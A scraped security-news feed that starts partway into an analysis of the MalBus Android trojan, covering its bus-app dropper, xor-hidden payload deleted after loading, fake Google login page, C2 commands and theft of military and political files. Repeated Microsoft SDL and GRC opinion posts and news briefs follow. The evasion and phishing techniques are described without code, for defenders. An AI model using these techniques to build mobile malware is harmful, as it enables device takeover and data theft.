When the malicious transportation app is installed, it downloads an additional payload from hacked web servers which includes the fake plugin we originally acquired. After the fake plugin is downloaded and installed, it does something completely different – it acts as a plugin of the transportation application and installs a trojan on the device, trying to phish users to input their Google account password and completely take control of the device. What is interesting is that the malware uses the native library to take over the device and also deletes the library to hide from detection. It uses names of popular South Korean services like Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed to only a small group of targets.

The Campaign

The following diagram explains the overall flow from malware distribution to device infection.

Figure 2. Device infection process

When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

Initial Downloader

The following table shows information about the malicious version of each transportation app in the series. As the Google Play number of install stats shows, these apps have been downloaded on many devices.

Unlike the clean version of the app, the malicious version contains a native library named “libAudio3.0.so”.

Figure 3. Transportation app version with malicious native library embedded

In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

Figure 4. Malicious library being loaded and executed in the app

startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as libSound1.1.so) is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

Figure 5 Additional payload download servers

Fake Plugin

The fake plugin is downloaded from a hacked web server with file extension “.mov” to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function implemented in LibMovie.so, which is stored inside the asset folder, drops a malicious trojan to the current running app’s directory masquerading as libpng.2.1.so file. The dropped trojan is originally embedded in the LibMovie.so xor’ed, which is decoded at runtime. After giving permissions, the address of the exported function “Libfunc” in the dropped trojan is dynamically retrieved using dlsym(). The dropped binary in the filesystem is deleted to avoid detection and finally Libfunc is executed.

Figure 6 Toast message when malware is installed

In the other forked process, it tries to access the “naver.property” file on an installed SD Card, if there is one, and if it succeeds, it tries starting “.KaKaoTalk” activity which displays a Google phishing page (more on that in the next section) . The overall flow of the dropper is explained in the following diagram:

Figure 7. Execution flow of the dropper

Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

Phishing in JavaScript

KakaoTalk class opens a local HTML file, javapage.html, with the user’s email address registered on the infected device automatically set to log into their account.

Figure 9. KakaoTalk class loads malicious local html file

The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

Figure 10. The malicious JavaScript shows crafted Google login page with user account

We found the following attempts of exploitation of Google legitimate services by the malware author:

  • Steal victim’s Google account and password
  • Request password recovery for a specific account
  • Set recovery email address when creating new Google account

An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.

Trojan

In addition to the Google phishing page, when “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the mobile phone is totally compromised. It receives commands from the following hardcoded list of C2 servers. The main functionality of the trojan is implemented in a function called “doMainProc()”. Please note that there are a few variants of the trojanwith different functionality but, overall, they are pretty much the same.

Figure 12. Hardcoded list of C2 servers

The geolocation of hardcoded C2 servers lookslike the following:

Figure 13. Location of C2 Servers

Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

Figure 14. Subset of command handlers implemented in the dropped trojan.

As you can see, it has all the functionality that a normal trojan has. Downloading, uploading and deleting files on the device, leaking information to a remote server and so on. The following table explains supported C2 commands:

Figure 15. C2 Commands

Before entering the command handling loop, the trojan does some initialization, like sending device information files to the server and checking the UID of the device. Only after the UID checking returns a 1 does it enter the loop.

Figure 16 Servers connected before entering command loop

Among these commands, directory indexing in particular is important. The directory structure is saved in a file named “kakao.property” and while indexing the given path in the user device, it checks the file with specific keywords and if it matches, uploads the file to the remote upload server. These keywords are Korean and its translated English version is as per the following table:

Figure 17 Search file keywords

By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

Figure 18 Keyword matching file upload server

Conclusion

Applications can easily trick users into installing them before then leaking sensitive information. Also, it is not uncommon to see malware sneaking onto the official Google Play store, making it hard for users to protect their devices. This malware has not been written for ordinary phishing attempts, but rather very targeted attacks, searching the victim’s devices for files related to the military and politics, likely trying to leak confidential information. Users should always install applications that they can fully trust even though they are downloaded from trusted sources.

McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Hashes (SHA-256)

Initial Downloader (APK)
• 19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270
• bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
• 3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9
• e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801

Fake Plugin (APK)
• ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec
• b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0

Trojan (additional payload)
• b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf
• 12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec
• 91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f
• 20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9

The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

Microsoft Secure: Announcing the new Security Engineering website

To meet users expectations for security when using a product or cloud service, security must be an integral part of all aspects of the lifecycle. We all know this, and yet time has proven that this is far easier said than done because there is no single approach nor silver bullet that works in every situation. However, Microsofts long commitment to security has demonstrated that there are a number of security practices that have survived the passage of time, and when applied flexibly in harmony with many approaches, will improve the security of products or cloud services.

We are sharing the results of our experiences through our new Security Engineering website, which includes updated Microsoft Security Development Lifecycle (SDL) practices that focus on development teams and what we believe to be the basic minimum steps for addressing security concerns when using open source. Additionally, weve included more specific Operational Security Assurance (OSA) practices, aligned with the operational lifecycle of cloud services, and we touch on how these can be brought together to deliver Secure DevOps.

There are four main sections to the new site:

Security Development Lifecycle (SDL)

The new The Security Development Lifecycle (SDL) site offers updated practices that should be used during the development process, to build more secure software by reducing the number and severity of vulnerabilities accidentally introduced into software. The practices cover a broad range of topics, from training and threat modeling, to managing the security risk of using third-party components, and security testing.

Operational Security Assurance (OSA)

The Operational Security Assurance (OSA) section outlines aligned practices to apply during the operational lifecycle of cloud services, making them more resilient to attack from real and potential cybersecurity threats. These include elements such as using Multi-Factor Authentication (MFA), protecting secrets, protecting against DDOS attacks, and penetration testing.

Secure DevOps

The Secure DevOps model provides a great foundation to improve security. SDL and OSA practices aligned with automation, monitoring, collaboration, and fast and early feedback provide a great opportunity to improve security. Practices outlined here include tooling and automation and continuous learning and monitoring.

Open Source Security

The Open Source Security section outlines the minimum steps necessary to begin to address security concerns when using open source components. Here the practices cover topics such as inventorying open source, updating components, and aligning security response processes, and aligns with the SDL practice of managing the security risk of using third-party components.

Throughout the site you will find useful references and resources to help. There are even consulting services offerings if you need them. See our Security documentation, where many of these resources can be found along with other useful security research papers, guides, and references. We hope you find the new Security Engineering site useful and encourage you to explore and share with your development and operations teams.

The post Announcing the new Security Engineering website appeared first on Microsoft Secure.



Microsoft Secure

Announcing the new Security Engineering website

To meet users expectations for security when using a product or cloud service, security must be an integral part of all aspects of the lifecycle. We all know this, and yet time has proven that this is far easier said than done because there is no single approach nor silver bullet that works in every situation. However, Microsofts long commitment to security has demonstrated that there are a number of security practices that have survived the passage of time, and when applied flexibly in harmony with many approaches, will improve the security of products or cloud services.

We are sharing the results of our experiences through our new Security Engineering website, which includes updated Microsoft Security Development Lifecycle (SDL) practices that focus on development teams and what we believe to be the basic minimum steps for addressing security concerns when using open source. Additionally, weve included more specific Operational Security Assurance (OSA) practices, aligned with the operational lifecycle of cloud services, and we touch on how these can be brought together to deliver Secure DevOps.

There are four main sections to the new site:

Security Development Lifecycle (SDL)

The new The Security Development Lifecycle (SDL) site offers updated practices that should be used during the development process, to build more secure software by reducing the number and severity of vulnerabilities accidentally introduced into software. The practices cover a broad range of topics, from training and threat modeling, to managing the security risk of using third-party components, and security testing.

Operational Security Assurance (OSA)

The Operational Security Assurance (OSA) section outlines aligned practices to apply during the operational lifecycle of cloud services, making them more resilient to attack from real and potential cybersecurity threats. These include elements such as using Multi-Factor Authentication (MFA), protecting secrets, protecting against DDOS attacks, and penetration testing.

Secure DevOps

The Secure DevOps model provides a great foundation to improve security. SDL and OSA practices aligned with automation, monitoring, collaboration, and fast and early feedback provide a great opportunity to improve security. Practices outlined here include tooling and automation and continuous learning and monitoring.

Open Source Security

The Open Source Security section outlines the minimum steps necessary to begin to address security concerns when using open source components. Here the practices cover topics such as inventorying open source, updating components, and aligning security response processes, and aligns with the SDL practice of managing the security risk of using third-party components.

Throughout the site you will find useful references and resources to help. There are even consulting services offerings if you need them. See our Security documentation, where many of these resources can be found along with other useful security research papers, guides, and references. We hope you find the new Security Engineering site useful and encourage you to explore and share with your development and operations teams.

The post Announcing the new Security Engineering website appeared first on Microsoft Secure.

Four differences between the GDPR and the CCPA

By passing the California Consumer Privacy Act (CCPA), which goes into effect on January 1, 2020, the Golden State is taking a major step in the protection of consumer data. The new law gives consumers insight into and control of their personal information collected online. This follows a growing number of privacy concerns around corporate access to and sales of personal information with leading tech companies like Facebook and Google. The bill was signed by … More

The post Four differences between the GDPR and the CCPA appeared first on Help Net Security.

CISOs: Change your mindset or lose your job

Capgemini commissioned IDC to produce a new piece of research, which reveals the increasing pressure on the Chief Information Security Officer to drive forward digital transformation – or risk losing their seat at the table when it comes to key business decisions. Whilst CISOs are now involved in 90% of significant business decisions, the research found that just 25% of business executives perceive CISOs as proactively enabling digital transformation – which is a key goal … More

The post CISOs: Change your mindset or lose your job appeared first on Help Net Security.

Evaluating the biggest cyber threats to the electric power sector

The network of power plants and lines connecting to homes and businesses is widely considered to be among the most critical infrastructure in the world. It’s also one of the most frequently attacked, with consequences that could potentially reach far beyond the power sector. A new Deloitte Global report, “Managing cyber risk in the electric power sector,” evaluates the biggest cyberthreats to the electric power sector and suggests how companies can manage these risks. The … More

The post Evaluating the biggest cyber threats to the electric power sector appeared first on Help Net Security.

Email authentication use growing steadily in every industry sector

U.S. federal government agencies and many major enterprises have made significant strides to thwart the spread of fake emails, a major cybersecurity attack vector. But many organizations remain susceptible because they’re still not using readily available open standards-based technologies that prevent these fakes from reaching end-user inboxes. Valimail’s “Email Fraud Landscape, Q4 2018” indicates that the fight against fake email is advancing around the world — but email fraud remains a widespread and pernicious problem. … More

The post Email authentication use growing steadily in every industry sector appeared first on Help Net Security.

Can Enterprises execute a GRC Movement?

Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

Before I start, stating some facts: – Global IT spend according to Gartner is 3.7 Trillion in 2018, and Cyber security market is 150 Billion which makes cyber security 4% of the total IT industry and growing at 10% CAGR …of all the various solutions under cyber security like Identity & Access, Application security, Network security, Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.
Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

GRC GLOBAL CYBER SECURITY MARKET
GLOBAL CYBER SECURITY MARKET

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

The need of the hour in the organization is the identify and mitigate risks that will seriously prohibit the growth of the business. Any business is run with governance framework and various industry regulatory compliance. Any issue in corporate governance or compliance leads to increase in risk…Hence a Platform is required whose purpose is to reduce the risk in the organization. GRC Automation platform or an Integrated Risk Management solution serves the purpose!

Just a food for thought…Even a bad code can function…but it will be disastrous! Hence it’s imperative to have a well thought coding governance structure for creating a good coding practice…similarly in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance Risk and Compliance (GRC) is about managing your enterprise data effectively but with data comes its security and privacy concerns too. So why not think of outsourcing or transferring the risk?…well not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always be within your organization. Hence you need to contain your risk…by continuously monitoring your enterprise data. So now the challenge in managing your inhouse data! (yes data the buzz word…”whoever controls the data ..controls the world!”)

To securely house the data we need to identify which is the most critical information or PII (personally identifiable information) to be protected or what policy needs to be crafted that will protect the compliance of the various controls that are applied on the identified risks! Like the GDPR Law has shown comprehensive checks and deterrents to protect the EU citizen data. One thing to remember is that these data protection laws are not about protecting data but ultimately about people! (remember Article 17 ‘right to be forgotten’ in GDPR)

Also with digital transformation and internet proliferation cyber frauds and crime will only increase! Which means the threat to people and their privacy would always increase!

So where do we start?

The starting point is always the internal policies or external regulations that guard the organizational boundaries or in social life the human rights! These policies are the key to governance or success of the entire GRC Program in an organization. Policies define the boundaries which would act as the perimeter defence which needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and any non-compliance to these policies are tracked to closure according to the risk appetite. This standardization could be achieved through a platform called GRC!

But there are many challenges in GRC adoption…even after more than a decade of GRC presence, I still hear incoherent objections from clients.

3 major objections are as follows: –

  1. Why shift to automation when current manual process is efficient enough?
  2. We only want Audit Management Automation so why invest in Integrated Risk Management or GRC solution?
  3. Internal team consuming the GRC features in day to day activities is very less which means the adoption by the internal risk or compliance team itself is less. So how to change this behaviour? (faced this with one of the world’s biggest stock exchanges)

The challenge is the adoption rate of GRC platform…many think its an added cost and hence continue with manual process…only to create more risk in their organization which keeps piling up!

To add to this with various automation products, document management platforms available, the GRC purpose is lost a bit among the chaos…

Hence I feel it’s time to create a larger awareness campaign for GRC… I call it ‘The GRC Movement’

If you look at all the world’s biggest historical events that have happened (be it the Martin Luther King, Jr. Civil Rights movement or Mahatma Gandhi Satyagraha or non -cooperation movement or the invention of Printing Press), are primarily triggered by a mass movement. Every global movement had a common goal to achieve…this collective purpose is missing in the GRC space today.

GRC

Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/

Why are social movements important in the world…because the collective actions of the social movement play an important role in bringing social change and also there was a need for the movement since a common message was not articulated or there was a lack of direction. Similarly, there is a need to creating a GRC movement in the enterprises. This movement will bring about risk cultural change which will ensure every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in 3 simple ways:-

Organization need a better approach to tackle cybersecurity and risk! I propose an approach to having a 360 degree view to make a GRC Movement happen.

This 360 degree GRC movement can be achieved using three aspects as follows:-

GRC for Enterprise:- (Contextual)

Are applications or use cases of GRC platforms or products for enterprises going to be different for different organisations? If yes then what kind of use cases? Might not be different but would be architectured or developed or configured differently.

Example: Every traffic signal has 3 alert lights globally but the traffic model in India is different than US or Australia or Europe (Parameters like traffic density, road width, peak time etc are all different for various economy) and similarly Autonomous driving in China and Germany might be different…

When a new technology or workflow is developed…you need to renegotiate the new policy…coz there is no right way of doing it but multiple wrong ways of doing it.

Example: what if a new camera comes which sees through the walls? You would want to renegotiate your corporate privacy policy! It’s a continuous improvement cycle.

The true value of a GRC technology for the end users or stakeholders is in its user experience. The comfort with which the users can create reports, dashboards or conduct a risk assessment would be the key for the enterprise. This would decide the adoption rate and consumption rate of the GRC solution within the enterprise users.

Any innovation doesn’t hurt users…users are hurt coz change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise: (Ownership)

The organization goes through complete chaos if risk process is handled manually …hence if you digitise risk…then you are in more control over your data which would lead to more visibility!

As the GRC Platform of the enterprise matures, it would become the protected property or IP of the organization…its too risky for any organization to handle the governance & compliance aspects or tasks manually…as even a single miss of an event or an incident can bring the organization down financially. The enterprises need to be alert 24×7 but the hackers need to get in just once! The Risk or compliance team within the enterprise know the genesis of every problem and only they can solve it using automation to reduce the efforts and manual error for the long-term gains.

Privacy and Accountability of the data of GRC tool…is a critical aspect hence various compliance to regulations like GDPR would be the key for a successful GRC journey! Without mapping the controls to the policy or corporate objective to check which policy violation has happened, the core purpose of integrated GRC platform will never be achieved! This will lead to accountability in the org!

All executives and senior leadership should have more knowledge of the regulations in their industry as all their actions are linked to the risk and compliance of their enterprise.

By simply training employee would not be enough and hence its crucial to take the process maturity and standardization achieved through the GRC platform ahead consistently. Revisiting the various workflows, KPI and metrics and fine tuning it to suit the ever-changing cyber world is the key!

GRC platform for an already established and matured organization would be different as compared to newly formed organization.

For this the GRC management would need to have a VC v/s PE mindset depending on the organizational maturity.

A Venture Capitalist would take a start-up and grow it exponentially…A PE will take an already established company to grow it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field…how do we as an entire ecosystem develop GRC talent and skills in an enterprise…

Can a unique problem in the enterprise be solved by a unique workflow configured by an enterprise…which could be a case study for the industry to learn from!

Has there been an increase in the adoption of using the GRC platform for risk and compliance records after the enhancement in the user experience. The GRC group within the enterprise can contribute to the external world their learnings…

In the GRC space every organization hunts for the best practices which is implemented by other organization, but this data is publicly not available as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy ! Like climate change can be dealt with policy changes globally. Also we need to remember that no policy is written in stone as evolution needs to happen! So a common database of best practices in GRC is the need of the hour!

The success of the GRC movement would be in its adoption by all parties simultaneously. Its in everyone’s interest to collaborate and share the success stories with other enterprises without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further which would be the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence for a successful GRC Program an organization needs to have a GRC vision which comprises of all 3 above dimensions.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (Cyber Security division of Dell) handling the presales for GRC Archer for SEA and SAARC Market. He is a Cybersecurity Evangelist and a GRC Architect.

Starting his consulting career with Deloitte, he is a seasoned Cyber security & Privacy professional with end to end experience of delivery, sales and presales. He has managed various markets like US Europe and Middle east in his previous avatar.

His proposal paper on “Internet of Things” was selected for ISF Copenhagen World congress Nov 2014 and Atlanta World Congress 2015.

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.

Security Affairs: Can Enterprises execute a GRC Movement?

Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.

The only place I can say more risk = more gain would be in the entrepreneurship space…because in the enterprise cyber security kingdom, it is just the opposite! So let me explain…

Before I start, stating some facts: – Global IT spend according to Gartner is 3.7 Trillion in 2018, and Cyber security market is 150 Billion which makes cyber security 4% of the total IT industry and growing at 10% CAGR …of all the various solutions under cyber security like Identity & Access, Application security, Network security, Managed security services or security operations, cloud security, GRC is one of the fastest growing solutions in the world.
Ref: https://www.gartner.com/en/information-technology/insights/cybersecurity Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

GRC GLOBAL CYBER SECURITY MARKET
GLOBAL CYBER SECURITY MARKET

Ref: https://www.statista.com/statistics/595182/worldwide-security-as-a-service-market-size/

The need of the hour in the organization is the identify and mitigate risks that will seriously prohibit the growth of the business. Any business is run with governance framework and various industry regulatory compliance. Any issue in corporate governance or compliance leads to increase in risk…Hence a Platform is required whose purpose is to reduce the risk in the organization. GRC Automation platform or an Integrated Risk Management solution serves the purpose!

Just a food for thought…Even a bad code can function…but it will be disastrous! Hence it’s imperative to have a well thought coding governance structure for creating a good coding practice…similarly in the corporate governance environment, GRC programs create a good structure and are critical for managing your cybersecurity risk…even though manual processes seem to be working efficiently!

Governance Risk and Compliance (GRC) is about managing your enterprise data effectively but with data comes its security and privacy concerns too. So why not think of outsourcing or transferring the risk?…well not a good idea! Enterprises can outsource cyber security, but not risk. Risk will always be within your organization. Hence you need to contain your risk…by continuously monitoring your enterprise data. So now the challenge in managing your inhouse data! (yes data the buzz word…”whoever controls the data ..controls the world!”)

To securely house the data we need to identify which is the most critical information or PII (personally identifiable information) to be protected or what policy needs to be crafted that will protect the compliance of the various controls that are applied on the identified risks! Like the GDPR Law has shown comprehensive checks and deterrents to protect the EU citizen data. One thing to remember is that these data protection laws are not about protecting data but ultimately about people! (remember Article 17 ‘right to be forgotten’ in GDPR)

Also with digital transformation and internet proliferation cyber frauds and crime will only increase! Which means the threat to people and their privacy would always increase!

So where do we start?

The starting point is always the internal policies or external regulations that guard the organizational boundaries or in social life the human rights! These policies are the key to governance or success of the entire GRC Program in an organization. Policies define the boundaries which would act as the perimeter defence which needs to be continuously monitored. Policies not only help govern a nation but also govern an enterprise.

Once an appropriate policy is created, we need to ensure that implementation of the policy is managed and any non-compliance to these policies are tracked to closure according to the risk appetite. This standardization could be achieved through a platform called GRC!

But there are many challenges in GRC adoption…even after more than a decade of GRC presence, I still hear incoherent objections from clients.

3 major objections are as follows: –

  1. Why shift to automation when current manual process is efficient enough?
  2. We only want Audit Management Automation so why invest in Integrated Risk Management or GRC solution?
  3. Internal team consuming the GRC features in day to day activities is very less which means the adoption by the internal risk or compliance team itself is less. So how to change this behaviour? (faced this with one of the world’s biggest stock exchanges)

The challenge is the adoption rate of GRC platform…many think its an added cost and hence continue with manual process…only to create more risk in their organization which keeps piling up!

To add to this with various automation products, document management platforms available, the GRC purpose is lost a bit among the chaos…

Hence I feel it’s time to create a larger awareness campaign for GRC… I call it ‘The GRC Movement’

If you look at all the world’s biggest historical events that have happened (be it the Martin Luther King, Jr. Civil Rights movement or Mahatma Gandhi Satyagraha or non -cooperation movement or the invention of Printing Press), are primarily triggered by a mass movement. Every global movement had a common goal to achieve…this collective purpose is missing in the GRC space today.

GRC

Source: AFP/Getty Images / Pic Courtesy: Wikimedia Commons / https://www.pinterest.com/pin/803048177275425019/

Why are social movements important in the world…because the collective actions of the social movement play an important role in bringing social change and also there was a need for the movement since a common message was not articulated or there was a lack of direction. Similarly, there is a need to creating a GRC movement in the enterprises. This movement will bring about risk cultural change which will ensure every process in the enterprise is standardized and optimized. This would ultimately be demonstrated by a reduction in the count of risks in the organization.

I feel we can create a GRC movement in 3 simple ways:-

Organization need a better approach to tackle cybersecurity and risk! I propose an approach to having a 360 degree view to make a GRC Movement happen.

This 360 degree GRC movement can be achieved using three aspects as follows:-

GRC for Enterprise:- (Contextual)

Are applications or use cases of GRC platforms or products for enterprises going to be different for different organisations? If yes then what kind of use cases? Might not be different but would be architectured or developed or configured differently.

Example: Every traffic signal has 3 alert lights globally but the traffic model in India is different than US or Australia or Europe (Parameters like traffic density, road width, peak time etc are all different for various economy) and similarly Autonomous driving in China and Germany might be different…

When a new technology or workflow is developed…you need to renegotiate the new policy…coz there is no right way of doing it but multiple wrong ways of doing it.

Example: what if a new camera comes which sees through the walls? You would want to renegotiate your corporate privacy policy! It’s a continuous improvement cycle.

The true value of a GRC technology for the end users or stakeholders is in its user experience. The comfort with which the users can create reports, dashboards or conduct a risk assessment would be the key for the enterprise. This would decide the adoption rate and consumption rate of the GRC solution within the enterprise users.

Any innovation doesn’t hurt users…users are hurt coz change happens and the user experience changes!

So what’s your ‘GRC for Enterprise’ vision?

GRC of Enterprise: (Ownership)

The organization goes through complete chaos if risk process is handled manually …hence if you digitise risk…then you are in more control over your data which would lead to more visibility!

As the GRC Platform of the enterprise matures, it would become the protected property or IP of the organization…its too risky for any organization to handle the governance & compliance aspects or tasks manually…as even a single miss of an event or an incident can bring the organization down financially. The enterprises need to be alert 24×7 but the hackers need to get in just once! The Risk or compliance team within the enterprise know the genesis of every problem and only they can solve it using automation to reduce the efforts and manual error for the long-term gains.

Privacy and Accountability of the data of GRC tool…is a critical aspect hence various compliance to regulations like GDPR would be the key for a successful GRC journey! Without mapping the controls to the policy or corporate objective to check which policy violation has happened, the core purpose of integrated GRC platform will never be achieved! This will lead to accountability in the org!

All executives and senior leadership should have more knowledge of the regulations in their industry as all their actions are linked to the risk and compliance of their enterprise.

By simply training employee would not be enough and hence its crucial to take the process maturity and standardization achieved through the GRC platform ahead consistently. Revisiting the various workflows, KPI and metrics and fine tuning it to suit the ever-changing cyber world is the key!

GRC platform for an already established and matured organization would be different as compared to newly formed organization.

For this the GRC management would need to have a VC v/s PE mindset depending on the organizational maturity.

A Venture Capitalist would take a start-up and grow it exponentially…A PE will take an already established company to grow it multi-fold.

So what’s your ‘GRC of Enterprise’ vision?

GRC by Enterprise (Contribution)

How can enterprises contribute to the GRC field…how do we as an entire ecosystem develop GRC talent and skills in an enterprise…

Can a unique problem in the enterprise be solved by a unique workflow configured by an enterprise…which could be a case study for the industry to learn from!

Has there been an increase in the adoption of using the GRC platform for risk and compliance records after the enhancement in the user experience. The GRC group within the enterprise can contribute to the external world their learnings…

In the GRC space every organization hunts for the best practices which is implemented by other organization, but this data is publicly not available as many hesitate to share information. Hence I believe there is a need for a global social contract for our information security economy ! Like climate change can be dealt with policy changes globally. Also we need to remember that no policy is written in stone as evolution needs to happen! So a common database of best practices in GRC is the need of the hour!

The success of the GRC movement would be in its adoption by all parties simultaneously. Its in everyone’s interest to collaborate and share the success stories with other enterprises without which the GRC solution will soon be outdated! Let the world know your uniqueness and let others learn from your innovation. Let others build the platform further which would be the true spirit of collaboration!

So what’s your ‘GRC by Enterprise’ vision?

Hence for a successful GRC Program an organization needs to have a GRC vision which comprises of all 3 above dimensions.

This will create a GRC Democracy!

Note: Opinions expressed are solely my own and do not express the views or opinions of my employer.

Author: Deric Karunesudas is currently working with RSA (Cyber Security division of Dell) handling the presales for GRC Archer for SEA and SAARC Market. He is a Cybersecurity Evangelist and a GRC Architect.

Starting his consulting career with Deloitte, he is a seasoned Cyber security & Privacy professional with end to end experience of delivery, sales and presales. He has managed various markets like US Europe and Middle east in his previous avatar.

His proposal paper on “Internet of Things” was selected for ISF Copenhagen World congress Nov 2014 and Atlanta World Congress 2015.

He is a technology enthusiast and has keen interest in Entrepreneurship. Deric believes in the power of Cloud, Blockchain & data-driven disruption!

Twitter – @thisisderic

Pierluigi Paganini

(SecurityAffairs – GRC, cybersecurity)

The post Can Enterprises execute a GRC Movement? appeared first on Security Affairs.



Security Affairs

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss

Cryptocurrency exchange, QuadrigaCX, has suffered a security incident after it lost control of its customers assets. $137 million worth of

$137milllion Worth of QuadrigaCX’s Customers’ Bitcoin Stuck in The Abyss on Latest Hacking News.

Cyber Security Week in Review (Feb. 1)

Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Apple revoked a set of developer tools from Facebook. The two tech companies got into a tug-of-war this week over a Facebook program that came to light where they paid users to install a VPN on their mobile devices. Facebook would then track users’ habits via the VPN. Facebook has now ended that program.
  • Apple temporarily disabled its group FaceTime service as it fixes a vulnerability. If exploited, an attacker could potentially listen in on conversations via Apple devices’ microphones even if the user doesn’t answer a FaceTime call. Apple’s slow response to this bug has prompted New York’s attorney general to launch an investigation.
  • The U.S. filed several criminal charges against Chinese tech company Huawei. One indictment accused Huawei of attempting to steal trade secrets from mobile company T-Mobile, while another says the company worked to bypass American sanctions against Iran.

From Talos

  • Attackers are utilizing a fake job posting from Cisco Korea to infect users. Based on our research, we believe this is the latest in a long string of attacks from the same threat actor.
  • There are multiple vulnerabilities in ACD Systems' Canvas Draw 5. The vulnerable component of Canvas Draw 5 lies in the handling of TIFF and PCX images. Snort rules 39593 - 39596, 39599 - 39632, 47336, 47337 can help protect you from the exploitation of these vulnerabilities.
  • Python.org contains an exploitable denial-of-service vulnerability in its X509 certificate parser. A specially crafted X509 certificate can cause a NULL pointer to dereference, resulting in a denial of service. Snort rules 48854 and 48855 can protect you from the exploitation of this vulnerability. 
  • Talos discovered two vulnerabilities that could allow remote code execution and memory disclosure at the kernel level in WIBU-SYSTEMS WibuKey. WibuKey is a USB key designed to protect software and intellectual properties. Snort rules 47750 and 47751 can protect you from the exploitation of these vulnerabilities. 

Malware roundup

  • The FormBook malware is back, this time targeting retail and hospitality companies. The information-stealer first appeared in 2016, and its use has recently risen through a new malware-hosting service.
  • The FBI and Air Force are working together to dismantle a North Korean botnet. Joanap is a remote access tool believed to be associated with the Lazarus Group APT. Snort rule 46885 can prevent Joanap from making an outbound connection.
  • A new cryptocurrency malware is targeting Macs. A variant of OSX.DarthMiner, the malware steals browser cookies and saved passwords in the Google Chrome web browser. 
  • American and Belgian authorities shut down an illegal online marketplace. xDedic, a website that concealed the location of its servers and was often used to sell personal information stolen in cyber attacks, is responsible for roughly $68 million of fraud.

The rest of the news

  • Google removed several data collection apps from the iOS App Store. The apps collected data from users’ phones, browsers and routers with their consent. In exchange, Google sent gift cards to the users. However, they did not properly operate under Apple’s developer enterprise program.
